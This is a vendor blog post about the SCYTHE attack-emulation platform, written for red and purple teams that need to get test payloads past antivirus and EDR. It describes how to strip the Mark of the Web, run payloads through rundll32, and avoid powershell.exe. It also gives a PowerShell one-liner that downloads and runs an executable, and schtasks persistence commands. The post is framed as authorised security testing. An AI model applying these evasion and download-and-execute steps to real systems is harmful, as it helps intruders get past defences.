Unicorn Library

SCYTHE Library: Defense Evasion with SCYTHE

Written by Jorge Orchilles | Mar 2, 2021 5:00:00 AM

“Do you have any tips and tricks to avoiding Anti Virus (AV) and Endpoint Detection and Response (EDR) for initial execution so we can focus on testing the post access adversary behaviors with SCYTHE?” We get this question all the time and figured we should share the answer(s) here in our library. While we will focus on doing this with SCYTHE, you can apply these practices to other tools as well.

TL;DR

  • Use the SCYTHE Client Host (Stage 1 Executable) which does not change for your environment meaning you can allow-list it and/or code sign it with your organization’s code signing certificate
  • Remove the mark of the web for stage 2 executables
  • Execute via rundll32.exe
  • Avoid powershell.exe
  • Avoid scheduled tasks

Challenge of Execution

Customers use SCYTHE to emulate adversary behaviors post-access in their environments. SCYTHE does not claim to automate a Red Team or a Penetration Tester: We are a force multiplier to help them do more and also remove repetitive requirements. We need human intelligence: People can find vulnerabilities and exploit them manually in precise, targeted strikes that are less risky than any tool claiming to automate exploitation. 

Once you have initial access, or if you are doing a Purple Team Exercise or Assume Breach engagement, you are ready to execute a SCYTHE payload to automate adversary behaviors in the environment. Execution is a MITRE ATT&CK Tactic that we can emulate a number of different ways to test security controls, people, and process for response.

Depending on the AV and EDR used by the organization, some of these procedures may be blocked-- this is a good thing, you’ve validated a level of prevention/protection for your organization! However, with the SCYTHE payload blocked at this stage, how do we test all the other MITRE ATT&CK Tactics, Techniques, and Procedures that adversaries constantly use?

SCYTHE Client Host (Stage 1 Executable)

One of the new features of SCYTHE 3.2 came directly from a customer request. This customer has a very mature security program and they were implementing application control (allow-listing), as well as internal code signing infrastructure. They wanted a way to have a static executable that could be both allow-listed and code signed (T1218). SCYTHE delivered the Client Host in version 3.2. The Client Host is a stage 1 executable that is generated on a per customer basis and has the ability to download and execute other SCYTHE payloads.

When you upgrade to SCYTHE 3.2, you will see a new Utilities section under Campaign Manager:

Here you can download the SCYTHE Client Host as a 64 bit or 32 bit binary:

 

You can immediately allow-list the Client Host in you AV or EDR and/or you can sign it with your organization's code signing certificate in the Key Store:

 

To execute a new campaign through the Client Host, start a campaign as you normally would. Then in the campaign page, select “More actions…” ->  “Direct Download Links”. Copy and Paste the 32-bit or 64-bit (depending on the Client Host you downloaded) Reflective Loader + DLL URL. Paste it into the respective SCYTHE Client Host fields and click Download and Start:

 

You can also execute the SCYTHE Client Host from a command line using the syntax: 

scythe_client_host64.exe “64-bit Reflective URL” “64-bit Signature”

Using the SCYTHE Client Host is the best practice method of avoiding AV and EDR for the initial execution. This allows customers to allow-list and/or code sign the SCYTHE executable and launch all campaigns through it.

Mark of the Web

SCYTHE provides Drive-By Download functionality (T1204.001) to host the stage 2 executable or shared library created for each campaign (Executables and DLLs). Users downloading these from the Internet will have them marked with the Zone identifier (“Mark of the Web” stored as an Alternate Data Stream). Microsoft introduced this feature in Windows XP Service Pack 2 and it continues in later versions including Windows 10. Current supported versions of Windows (8+) alerts Application Reputation Check using Windows SmartScreen. This requires the user to click “More Info” and then “Run Anyway” when double clicking the executable.

There are multiple ways to remove the Mark of the Web alternate data stream to make execution easier for you. First, move the file from the Downloads folder to any other folder. Then perform the following operation based on the option you choose: 

  • GUI: right click the executable, select properties, and check “Unblock” 
  • PowerShell: open a PowerShell prompt and type: Unblock-File -Path “<file path>”

Download Streams from Sysinternals: streams.exe -d “<file path>”

Rundll32.exe

A very common method that malware uses to execute in target environments is what we call Living Off the Land Binaries and Scripts (LOLBAS). MITRE calls them Signed Binary Proxy Execution. Regardless of the name, SCYTHE provides 32-bit and 64-bit DLLs for each campaign so you can run from rundll32.exe (T1218.011) or your own shared library loader. You can download the DLLs through the SCYTHE GUI or from the Drive-By Download functionality. If downloading through the GUI, you can set the entry-point function name which will be important for when you execute. The default, or if you download from the drive-by site is: PlatformClientMain

To execute the DLL with rundll32.exe:

  • Open a command prompt
  • Change directory to where the DLL is, or use the absolute path
  • rundll32.exe “<file path>”,PlatformClientMain
  • Note there is no space between the file path, the comma, and the entry-point function name

PowerShell.exe

We have covered PowerShell a few times in our SCYTHE Library. Tim Schulz wrote a post about the continuing pain of PowerShell and I posted a Threat Thursday on how to test and detect powershell.exe

This is a test case you want to test in your environment. If it is being detected and/or prevented and you want to evade detection, then simply avoid it. Instead of running the run module that executes powershell.exe:

run powershell whoami 

Use the unmanaged PowerShell module: 

upsh --cmd whoami

Since we are covering a execution in this blog, here is a simple PowerShell one-liner that will retrieve the stage 2 executable and run it (T1059.001):

$myscriptblock={$url="<download link>";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

 

Scheduled Tasks

Lastly, another technique we see getting detected by EDRs out of the box is Scheduled Tasks (T1053.005). The reason for this is most likely the common use of the technique by so many groups, just scroll down the MITRE ATT&CK site and look at all those Procedure Examples.

Given this sub-technique is used by so many threat actors, it is a good idea to test the creation, querying, and execution of schedule

 

run cmd /c SCHTASKS /CREATE /SC DAILY /TN \"MyTasks\\Example Task\" /TR \"C:\\Windows\\System32\\calc.exe\" /ST 11:00 /F

run cmd /c SCHTASKS /QUERY /TN \"MyTasks\\Example Task\"

run cmd /c SCHTASKS /RUN /TN \"MyTasks\\Example Task\"

run cmd /c SCHTASKS /DELETE /TN \"MyTasks\\Example Task\" /F

We often get asked how to schedule the execution of SCYTHE campaigns and Scheduled Tasks is a method that can be used for that as well. Copy the SCYTHE executable or DLL to the target system and create a scheduled task with the frequency you desire. For more details about Scheduled Tasks, check out the Microsoft TechNet page.

Conclusion

SCYTHE may be used during stealth red team engagements as well as Assumed Breach and Purple Team Exercises. We provide a number of ways to execute the SCYTHE campaign in your environment and have use cases for avoiding detection and prevention from Anti-Virus and Endpoint Detection and Response (EDR) solutions. As usual, you should walk before you run. Make sure that your organization can detect and respond to the most used techniques, and then focus on the more stealthy and evasion techniques.

About SCYTHE

SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, or follow on Twitter @scythe_io.